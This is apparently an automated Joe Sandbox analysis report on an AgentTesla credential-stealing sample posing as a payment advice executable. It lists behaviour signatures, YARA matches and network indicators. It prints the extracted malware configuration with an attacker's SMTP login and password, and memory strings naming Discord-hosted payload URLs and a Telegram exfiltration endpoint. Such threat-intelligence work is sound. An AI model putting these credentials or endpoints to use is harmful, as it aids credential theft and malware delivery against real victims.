Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE

Overview

General Information

Sample Name:USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
Analysis ID:321120
MD5:5d3d23738b2b4bb1f7fe3371ea7ecc76
SHA1:4e72608c340c7b18f4ff359552da57c9dee29e99
SHA256:21b054a3b319b950887eff329ebb237a5d442e6742e94d66d2ff17cd85f8d930
Tags:EXEHSBCModiLoader

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • Owdpdrv.exe (PID: 6760 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe' MD5: 5D3D23738B2B4BB1F7FE3371EA7ECC76)
    • Owdpdrv.exe (PID: 4800 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe MD5: 5D3D23738B2B4BB1F7FE3371EA7ECC76)
  • Owdpdrv.exe (PID: 6872 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe' MD5: 5D3D23738B2B4BB1F7FE3371EA7ECC76)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "PQTF8kmaji", "URL: ": "http://WuQXJFerpNu.net", "To: ": "Crystal@suncurepelletmill.com", "ByHost: ": "mail.suncurepelletmill.com:587", "Password: ": "Y4nU5SbKWMVNWw", "From: ": "Crystal@suncurepelletmill.com"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\pdwO.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\pdwO.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\pdwO.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.932033702.00000000021F4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000003.767263953.00000000004C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.935842915.0000000004F00000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.935435728.0000000003471000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.783743346.0000000002C67000.00000020.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
          • 0xde8:$file: URL=
          • 0xdcc:$url_explicit: [InternetShortcut]
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.Owdpdrv.exe.4f00000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4ec0000.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.Owdpdrv.exe.4f00000.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 3 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4460.2.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "PQTF8kmaji", "URL: ": "http://WuQXJFerpNu.net", "To: ": "Crystal@suncurepelletmill.com", "ByHost: ": "mail.suncurepelletmill.com:587", "Password: ": "Y4nU5SbKWMVNWw", "From: ": "Crystal@suncurepelletmill.com"}
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeReversingLabs: Detection: 16%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEVirustotal: Detection: 26%Perma Link
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEReversingLabs: Detection: 16%
                    Source: 5.2.Owdpdrv.exe.2c50000.6.unpackAvira: Label: TR/Hijacker.Gen
                    Source: 1.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2df0000.5.unpackAvira: Label: TR/Hijacker.Gen
                    Source: 1.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2e90000.6.unpackAvira: Label: TR/Dropper.Gen
                    Source: 5.2.Owdpdrv.exe.2cf0000.7.unpackAvira: Label: TR/Dropper.Gen

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49769 -> 192.186.237.168:587
                    Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                    Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                    Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownDNS traffic detected: queries for: discord.com
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934877979.00000000027C3000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000003.899170983.0000000005111000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934934311.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://WuQXJFerpNu.net
                    Source: Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: http://hHeaxI.com
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934905842.00000000027C9000.00000004.00000001.sdmpString found in binary or memory: http://mail.suncurepelletmill.com
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934905842.00000000027C9000.00000004.00000001.sdmpString found in binary or memory: http://suncurepelletmill.com
                    Source: Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disc8
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discorda
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.c
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/a
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attac0
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachmen
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/7
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/77848
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/7784816176054
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/77848161760549277$
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/77
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/779193
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/7791933544
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/77919335445784
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664/OwdH
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664/Owdprrr
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/7784816178
                    Source: Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: Yara matchFile source: Process Memory Space: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 3912, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Owdpdrv.exe PID: 6760, type: MEMORY

                    System Summary:

                    barindex
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00408C602_2_00408C60
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040DC112_2_0040DC11
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00407C3F2_2_00407C3F
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00418CCC2_2_00418CCC
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00406CA02_2_00406CA0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004028B02_2_004028B0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0041A4BE2_2_0041A4BE
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004182442_2_00418244
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004016502_2_00401650
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00402F202_2_00402F20
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004193C42_2_004193C4
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004187882_2_00418788
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00402F892_2_00402F89
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00402B902_2_00402B90
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004073A02_2_004073A0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004800402_2_00480040
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0048A4D82_2_0048A4D8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0048CCF82_2_0048CCF8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004895F82_2_004895F8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00480D912_2_00480D91
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004870482_2_00487048
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004930482_2_00493048
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0049BC782_2_0049BC78
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0049D9882_2_0049D988
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00498E002_2_00498E00
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0049F2202_2_0049F220
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004933112_2_00493311
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00499CE82_2_00499CE8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0049AD802_2_0049AD80
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_008148242_2_00814824
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_008130282_2_00813028
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_008184782_2_00818478
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_008115602_2_00811560
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0081A8C82_2_0081A8C8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00812FC82_2_00812FC8
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0081DF122_2_0081DF12
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0086B2782_2_0086B278
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00408C6011_2_00408C60
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0040DC1111_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00407C3F11_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00418CCC11_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00406CA011_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_004028B011_2_004028B0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041A4BE11_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041824411_2_00418244
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0040165011_2_00401650
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00402F2011_2_00402F20
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_004193C411_2_004193C4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041878811_2_00418788
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00402F8911_2_00402F89
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00402B9011_2_00402B90
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_004073A011_2_004073A0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_02170C5611_2_02170C56
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_02170C6011_2_02170C60
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_04F7004011_2_04F70040
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_04F7001F11_2_04F7001F
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_04F7928311_2_04F79283
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_05A62FA011_2_05A62FA0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_05A64EB011_2_05A64EB0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_05A6238811_2_05A62388
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_05A626D011_2_05A626D0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: String function: 0040E1D8 appears 43 times
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEStatic PE information: invalid certificate
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Owdpdrv.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696671406.00000000023F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.698043220.000000007F470000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameygwxuBNDsCnleMFrPILFrkECdmuYRRQwMZPAraQ.exe4 vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.697939174.00000000046E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696682355.0000000002410000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.697299189.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameygwxuBNDsCnleMFrPILFrkECdmuYRRQwMZPAraQ.exe4 vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000003.698959513.0000000000708000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.930286972.00000000007F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938935829.0000000005610000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938230564.0000000004F30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.938190674.0000000004F20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.927026885.0000000000198000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.939208870.0000000005920000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXESection loaded: mscorjit.dllJump to behavior
